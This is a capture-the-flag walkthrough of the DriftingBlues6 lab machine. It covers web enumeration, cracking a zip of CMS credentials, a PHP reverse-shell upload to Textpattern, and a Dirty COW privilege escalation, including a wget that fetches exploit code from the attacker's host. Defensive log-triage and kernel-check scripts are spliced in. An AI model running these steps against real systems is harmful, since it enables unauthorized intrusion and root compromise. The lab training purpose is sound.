PG - DriftingBlues6

In this walkthrough, we will be going through the DriftingBlues6 room from Proving Grounds. This room is rated as Easy on the platform, and it consists of basic enumeration of the Textpattern CMS, which later leads to RCE on the target. For the privilege escalation part, it requires the use of a popular Linux kernel exploit. So, let’s get started without any delay.

DriftingBlues6

Machine Info:

Title: Monitoring
IP address: 192.168.225.136
Difficulty: Easy
OS: Linux
Description: DriftingBlues6 is an easy rated machine, and it involves basic enumeration of the Textpattern CMS, which later leads to RCE on the target. For the privilege escalation part, it requires the use of a popular Linux kernel exploit.

Enumeration:

  • I started off with my regular nmap aggressive scan and found only one port open – 80 (HTTP).

$ sudo nmap -A 192.168.223.219
[sudo] password for wh1terose: 
Starting Nmap 7.80 ( https://nmap.org ) at 2024-01-09 14:18 IST

Nmap scan report for 192.168.223.219
Host is up (0.21s latency).
Not shown: 998 closed ports
PORT   STATE    SERVICE VERSION
53/tcp filtered domain
80/tcp open     http    Apache httpd 2.2.22 ((Debian))
| http-robots.txt: 1 disallowed entry 
|_/textpattern/textpattern
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: driftingblues
| vulners: 
|   cpe:/a:apache:http_server:2.2.22: 
|     	CVE-2017-7679	7.5	https://vulners.com/cve/CVE-2017-7679
|     	CVE-2017-3169	7.5	https://vulners.com/cve/CVE-2017-3169
|     	CVE-2017-3167	7.5	https://vulners.com/cve/CVE-2017-3167
|     	SSV:60427	6.9	https://vulners.com/seebug/SSV:60427	*EXPLOIT*
|     	SSV:60386	6.9	https://vulners.com/seebug/SSV:60386	*EXPLOIT*
|     	SSV:60069	6.9	https://vulners.com/seebug/SSV:60069	*EXPLOIT*
|     	CVE-2012-0883	6.9	https://vulners.com/cve/CVE-2012-0883
|     	PACKETSTORM:127546	6.8	https://vulners.com/packetstorm/PACKETSTORM:127546	*EXPLOIT*
|     	CVE-2016-5387	6.8	https://vulners.com/cve/CVE-2016-5387
|     	CVE-2014-0226	6.8	https://vulners.com/cve/CVE-2014-0226
|     	1337DAY-ID-22451	6.8	https://vulners.com/zdt/1337DAY-ID-22451*EXPLOIT*
|     	CVE-2017-9788	6.4	https://vulners.com/cve/CVE-2017-9788
|     	SSV:60788	5.1	https://vulners.com/seebug/SSV:60788	*EXPLOIT*
|     	CVE-2013-1862	5.1	https://vulners.com/cve/CVE-2013-1862
|     	SSV:96537	5.0	https://vulners.com/seebug/SSV:96537	*EXPLOIT*
|     	SSV:62058	5.0	https://vulners.com/seebug/SSV:62058	*EXPLOIT*
|     	SSV:61874	5.0	https://vulners.com/seebug/SSV:61874	*EXPLOIT*
|     	EXPLOITPACK:C8C256BE0BFF5FE1C0405CB0AA9C075D	5.0	https://vulners.com/exploitpack/EXPLOITPACK:C8C256BE0BFF5FE1C0405CB0AA9C075D	*EXPLOIT*
|     	EDB-ID:42745	5.0	https://vulners.com/exploitdb/EDB-ID:42745	*EXPLOIT*
|     	CVE-2017-9798	5.0	https://vulners.com/cve/CVE-2017-9798
|     	CVE-2016-8743	5.0	https://vulners.com/cve/CVE-2016-8743
|     	CVE-2015-3183	5.0	https://vulners.com/cve/CVE-2015-3183
|     	CVE-2014-0231	5.0	https://vulners.com/cve/CVE-2014-0231
|     	CVE-2014-0098	5.0	https://vulners.com/cve/CVE-2014-0098
|     	CVE-2013-6438	5.0	https://vulners.com/cve/CVE-2013-6438
|     	CVE-2013-5704	5.0	https://vulners.com/cve/CVE-2013-5704
|     	1337DAY-ID-28573	5.0	https://vulners.com/zdt/1337DAY-ID-28573*EXPLOIT*
|     	CVE-2012-0031	4.6	https://vulners.com/cve/CVE-2012-0031
|     	SSV:60905	4.3	https://vulners.com/seebug/SSV:60905	*EXPLOIT*
|     	SSV:60657	4.3	https://vulners.com/seebug/SSV:60657	*EXPLOIT*
|     	SSV:60653	4.3	https://vulners.com/seebug/SSV:60653	*EXPLOIT*
|     	SSV:60345	4.3	https://vulners.com/seebug/SSV:60345	*EXPLOIT*
|     	CVE-2016-4975	4.3	https://vulners.com/cve/CVE-2016-4975
|     	CVE-2014-0118	4.3	https://vulners.com/cve/CVE-2014-0118
|     	CVE-2013-1896	4.3	https://vulners.com/cve/CVE-2013-1896
|     	CVE-2012-4558	4.3	https://vulners.com/cve/CVE-2012-4558
|     	CVE-2012-3499	4.3	https://vulners.com/cve/CVE-2012-3499
|     	CVE-2012-0053	4.3	https://vulners.com/cve/CVE-2012-0053
|     	CVE-2008-0455	4.3	https://vulners.com/cve/CVE-2008-0455
|_    	CVE-2012-2687	2.6	https://vulners.com/cve/CVE-2012-2687
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=1/9%OT=80%CT=1%CU=40703%PV=Y%DS=4%DC=T%G=Y%TM=659D0873
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=10D%TI=Z%II=I%TS=8)SEQ(SP=10
OS:7%GCD=1%ISR=10D%TI=Z%TS=8)OPS(O1=M54EST11NW4%O2=M54EST11NW4%O3=M54ENNT11
OS:NW4%O4=M54EST11NW4%O5=M54EST11NW4%O6=M54EST11)WIN(W1=3890%W2=3890%W3=389
OS:0%W4=3890%W5=3890%W6=3890)ECN(R=Y%DF=Y%T=40%W=3908%O=M54ENNSNW4%CC=Y%Q=)
OS:T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%
OS:T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164
OS:%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=A359%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 4 hops

TRACEROUTE (using port 554/tcp)
HOP RTT       ADDRESS
1   206.53 ms 192.168.45.1
2   206.53 ms 192.168.45.254
3   206.57 ms 192.168.251.1
4   206.66 ms 192.168.223.219

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.85 seconds

nmap scan

  • Enumerated the web server running on port 80 and found a static page with information that seemed to be about an album.

Drifting Blues Tech

  • Fired gobuster at the target to reveal some hidden directories. The two interesting ones were /robots and /textpattern.

$ gobuster dir -u http://192.168.223.219/ -w ~/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.223.219/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2024/01/09 14:31:28 Starting gobuster in directory enumeration mode
===============================================================
/db                   (Status: 200) [Size: 53656]
/index                (Status: 200) [Size: 750]  
/robots               (Status: 200) [Size: 110]  
/textpattern          (Status: 301) [Size: 324] [--> http://192.168.223.219/textpattern/]
/server-status        (Status: 403) [Size: 296]                                          
                                                                                         
===============================================================
2024/01/09 14:38:03 Finished
===============================================================

gobuster scan

  • Checked the robots.txt file; it contains a single entry disallowing crawlers from a specific directory, /textpattern/textpattern.

robots.txt

  • I first enumerated the /textpattern directory, which shows what looks like the front page of a blog. Found nothing interesting here, as the links also pointed to a non-accessible host.

textpattern directory

  • Next, moved to the /textpattern/textpattern directory, which reveals a login page, confirming the Textpattern CMS. Then I performed a directory bruteforce again and found another directory, /textpattern, which reveals the version we are dealing with here: 4.8.3. This might come in handy later.

Textpattern login panel

textpattern file

  • At this point, I searched for the default creds of Textpattern CMS but found nothing credible. Next, tried a bunch of common username and password combos but still had no luck. Finally, after a lot of irrelevant enumeration, I once again performed a directory bruteforce on the root directory with a different wordlist, and this time it gave me another directory, “spammer”, which contains a zip file called spammer.zip.

$ gobuster dir -u http://192.168.216.219/ -w ~/Desktop/Wordlist/directory-medium.txt -x zip
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.216.219/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/directory-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              zip
[+] Timeout:                 10s
===============================================================
2024/01/10 13:52:16 Starting gobuster in directory enumeration mode
===============================================================
/index                (Status: 200) [Size: 750]
/db                   (Status: 200) [Size: 53656]
/robots               (Status: 200) [Size: 110]  
/spammer              (Status: 200) [Size: 179]  
/spammer.zip          (Status: 200) [Size: 179]  

gobuster scan

Initial Access:

  • Downloaded the zip file to my local machine; however, it was protected with a password. So, I cracked the password using john: myspace4.

zip2john spammer.zip > hash
john hash

cracking the zip

Got password of spammer.zip

  • After unzipping the file, I got the Textpattern backend creds.

unzip spammer.zip

unzip spammer.zip

cat creds.txt

  • Logged into the dashboard. Now, I looked for any known exploits for the running version of the application and found that it is vulnerable to an authenticated RCE vulnerability. I tried the available exploits, but they failed, so I performed the exploitation manually.

Got access to backend

  • Uploaded my PHP reverse shell payload using the application’s Files section, which can be found under the “Content” tab in the header menu.

File upload functionality

backdoor.php uploaded

  • Executed my payload by visiting the below URL and got the connection back at my netcat listener.

Index of /textpattern/files

got initial access
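Both web-side steps above, the gobuster sweep and the PHP payload served out of /textpattern/files, leave an obvious trail in the Apache access log. The script below is an added example (not from this write-up or from Textpattern) that runs simple detection logic over a few constructed combined-format log lines: it flags clients that rack up 404s or announce a scanner User-Agent, and any request for a script extension under the upload directory. The client IPs, file names and the 404 threshold in the sample are assumptions; the /textpattern/files path and the gobuster User-Agent string are taken from the page.

```python
"""Triage Apache combined-format access-log lines for two events seen in this
walkthrough: a directory brute force and a PHP file requested from Textpattern's
upload directory. Added example; the log lines below are constructed, not captured."""
import re
from collections import Counter, defaultdict

# Combined log format: host ident user [time] "METHOD path proto" status size "referer" "agent"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)

# Constructed sample: a scanner sweep from 10.0.0.5, then a request for a PHP file
# in the upload directory from 10.0.0.9, plus ordinary traffic from 10.0.0.7.
SAMPLE_LOG = """\
10.0.0.5 - - [09/Jan/2024:14:31:28 +0530] "GET /admin HTTP/1.1" 404 296 "-" "gobuster/3.1.0"
10.0.0.5 - - [09/Jan/2024:14:31:28 +0530] "GET /backup HTTP/1.1" 404 296 "-" "gobuster/3.1.0"
10.0.0.5 - - [09/Jan/2024:14:31:29 +0530] "GET /db HTTP/1.1" 200 53656 "-" "gobuster/3.1.0"
10.0.0.5 - - [09/Jan/2024:14:31:29 +0530] "GET /robots HTTP/1.1" 200 110 "-" "gobuster/3.1.0"
10.0.0.5 - - [09/Jan/2024:14:31:30 +0530] "GET /textpattern HTTP/1.1" 301 324 "-" "gobuster/3.1.0"
10.0.0.5 - - [09/Jan/2024:14:31:30 +0530] "GET /old HTTP/1.1" 404 296 "-" "gobuster/3.1.0"
10.0.0.5 - - [09/Jan/2024:14:31:31 +0530] "GET /test HTTP/1.1" 404 296 "-" "gobuster/3.1.0"
10.0.0.5 - - [09/Jan/2024:14:31:31 +0530] "GET /tmp HTTP/1.1" 404 296 "-" "gobuster/3.1.0"
10.0.0.9 - - [09/Jan/2024:14:40:02 +0530] "GET /textpattern/files/backdoor.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.0.0.9 - - [09/Jan/2024:14:40:07 +0530] "GET /textpattern/files/readme.pdf HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
10.0.0.7 - - [09/Jan/2024:14:45:00 +0530] "GET /index.html HTTP/1.1" 200 750 "-" "Mozilla/5.0"
"""

UPLOAD_DIR = "/textpattern/files/"          # Textpattern's file-upload directory (from the page)
SCRIPT_EXT = (".php", ".phtml", ".php5", ".phar")  # extensions a mod_php host would execute
SCANNER_AGENTS = ("gobuster", "dirbuster", "ffuf", "nikto")  # assumed list of known scanner UAs


def parse(log_text):
    """Yield one dict per well-formed combined-log line; malformed lines are skipped."""
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:
            yield m.groupdict()


def triage(log_text, min_404=5):
    """Return {'bruteforce': {ip: {...}}, 'script_in_upload_dir': [(ip, path, status), ...]}.

    A client is reported as brute-forcing when it produced at least `min_404`
    404 responses or used a known scanner User-Agent; the threshold is an assumption.
    """
    not_found = Counter()
    agents = defaultdict(set)
    upload_hits = []
    for e in parse(log_text):
        if e["status"] == "404":
            not_found[e["ip"]] += 1
        agents[e["ip"]].add(e["agent"])
        path = e["path"].split("?", 1)[0].lower()   # ignore any query string
        if path.startswith(UPLOAD_DIR) and path.endswith(SCRIPT_EXT):
            upload_hits.append((e["ip"], e["path"], e["status"]))
    bruteforce = {
        ip: {"not_found": n, "agents": sorted(agents[ip])}
        for ip, n in not_found.items()
        if n >= min_404 or any(a.lower().startswith(SCANNER_AGENTS) for a in agents[ip])
    }
    return {"bruteforce": bruteforce, "script_in_upload_dir": upload_hits}


if __name__ == "__main__":
    for kind, hits in triage(SAMPLE_LOG).items():
        print(kind, hits)
```

A 200 for a .php file under an upload directory is the line worth alerting on; the matching hardening is to serve that directory with script execution switched off (on mod_php, `php_admin_flag engine off` inside a `<Directory>` block for it), so an uploaded file is returned as bytes instead of being run.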

Privilege Escalation:

  • Checked the running kernel version number, and it shows 3.2.0-4-amd64, which is quite old. So, I checked for known exploits for it and found that it is vulnerable to the “Dirty Cow” vulnerability.

uname -r

  • Transferred the below exploit onto the target by spawning an HTTP server on my local machine.

Exploit: https://www.exploit-db.com/exploits/40839

Linux Kernel Race Condition Privilege Escalation

wget http://192.168.45.240:8000/40839.c

downloading the exploit on target

  • Compiled and executed the exploit. The exploit will prompt you to enter a new password for the new user, which will have root privileges. It may take a minute to complete.

gcc -pthread 40839.c -o exploit -lcrypt

chmod +x exploit

./exploit

compiling and executing the exploit

  • After the process completed, switched to the newly created root user, thus getting root on the target.

su firefart

password

got root

proof flag
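From the defender's side, the question raised by the privilege escalation above is whether a `uname -r` string like 3.2.0-4-amd64 actually tells you anything about CVE-2016-5195 (Dirty COW). The function below is an added example (not part of the walkthrough) that parses the version string, compares the 4.8, 4.7 and 4.4 series against the upstream releases that carried the fix (4.8.3, 4.7.9, 4.4.26), treats 4.9 and later as fixed, and for distribution-style strings such as the one on this target reports that the package version has to be checked, because the ABI-style string hides backported patches. The verdict labels, the scanner list and the 2.6.22 lower bound of the affected range are my own; the fix versions are upstream stable releases.

```python
"""Classify a `uname -r` string against CVE-2016-5195 (Dirty COW).
Added example for this write-up; the verdict strings are this example's own labels."""
import re

# Upstream releases that first carried the Dirty COW fix: mainline 4.9 and the
# 4.8 / 4.7 / 4.4 stable series at these point releases.
FIXED_UPSTREAM = {(4, 8): (4, 8, 3), (4, 7): (4, 7, 9), (4, 4): (4, 4, 26)}
FIRST_AFFECTED = (2, 6, 22)  # the race was introduced in 2.6.22 (assumed lower bound)

FIXED = "fixed-upstream"
VULNERABLE = "vulnerable-upstream"
PREDATES = "predates-affected-range"
CHECK_PACKAGE = "distro-kernel: uname hides the patch level, check the package version"
OLD_SERIES = "older-stable-series: unpatched upstream unless a backport applies"
UNPARSEABLE = "unparseable"

VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:-(\S+))?$")


def assess(uname_r):
    """Return one of the verdict labels above for a `uname -r` string."""
    m = VERSION_RE.match(uname_r.strip())
    if not m:
        return UNPARSEABLE
    major, minor, patch = (int(x) for x in m.group(1, 2, 3))
    suffix = m.group(4) or ""
    if (major, minor) >= (4, 9):
        return FIXED
    # Debian/Ubuntu kernels report e.g. 3.2.0-4-amd64: the third field is always 0
    # and the real upstream point release (and any backported fix) only shows up in
    # the package version (dpkg -l 'linux-image-*'), so the string alone proves nothing.
    if patch == 0 and suffix:
        return CHECK_PACKAGE
    version = (major, minor, patch)
    if version < FIRST_AFFECTED:
        return PREDATES
    fixed_at = FIXED_UPSTREAM.get((major, minor))
    if fixed_at is not None:
        return FIXED if version >= fixed_at else VULNERABLE
    return OLD_SERIES


if __name__ == "__main__":
    import subprocess
    running = subprocess.run(["uname", "-r"], capture_output=True, text=True).stdout
    print(running.strip(), "->", assess(running))
```

Run on the target's own string this returns the "check the package version" verdict rather than a yes or no, which is the point: on Debian-family hosts the patch level is in the package changelog, not in `uname -r`, and a version-string check that answers "vulnerable" for every 3.x kernel produces both false positives and a false sense of coverage.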

Conclusion:

So that was “DriftingBlues6” for you. We started off with a regular nmap scan and found only one open port: 80 (HTTP). Enumerated the web server on port 80 and found a Textpattern login panel. Fired gobuster at the target and found a spammer.zip file. Next, used john to crack the password of the zip file; the zip file reveals the password for the Textpattern login panel. Used the same to get into the backend of the Textpattern CMS. Next, abused the file upload functionality to get initial access on the target. For privilege escalation, found out that the Linux kernel version running is vulnerable to the Dirty COW exploit, and used it to get root on the target. On that note, I will take your leave and will meet you in the next one. Till then, “Happy hacking”.
